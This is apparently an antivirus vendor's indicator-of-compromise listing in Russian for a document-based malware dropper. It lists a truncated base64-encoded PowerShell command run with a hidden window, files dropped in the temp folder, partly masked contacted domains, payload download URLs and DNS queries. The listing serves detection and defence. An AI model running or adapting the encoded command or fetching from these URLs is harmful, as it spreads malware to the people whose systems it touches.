Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkANABwAGwAcgBqAD0AKAAnAEQAJwArACgAJwBtAG8AMAAnACsAJwBiAHIANAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVABlAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
- %TEMP%\1149711.cvr
- %TEMP%\word\2019\e0kb0j.exe
- %TEMP%\word\2019\e0kb0j.exe
- 'za###life.com':80
- 'za###life.com':443
- 'pa####alking.co.uk':443
- 'su#####.dogpack.media':80
- 'he#####k.dogpack.media':443
- 'no##gal.es':80
- 'no##gal.es':443
- http://za###life.com/wp-includes/P2Anjqkwlc4858/
- http://su#####.dogpack.media/tickets/qiDNPAj/
- http://no##gal.es/blogs/udZj/
- 'za###life.com':443
- 'pa####alking.co.uk':443
- 'su#####.dogpack.media':443
- 'no##gal.es':443
- DNS ASK za###life.com
- DNS ASK pa####alking.co.uk
- DNS ASK de#.#osily.in
- DNS ASK f1.##dve.com
- DNS ASK su#####.dogpack.media
- DNS ASK he#####k.dogpack.media
- DNS ASK no##gal.es
- DNS ASK ne#####ttailors.com.np
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkANABwAGwAcgBqAD0AKAAnAEQAJwArACgAJwBtAG8AMAAnACsAJwBiAHIANAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVABlAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG... (со скрытым окном)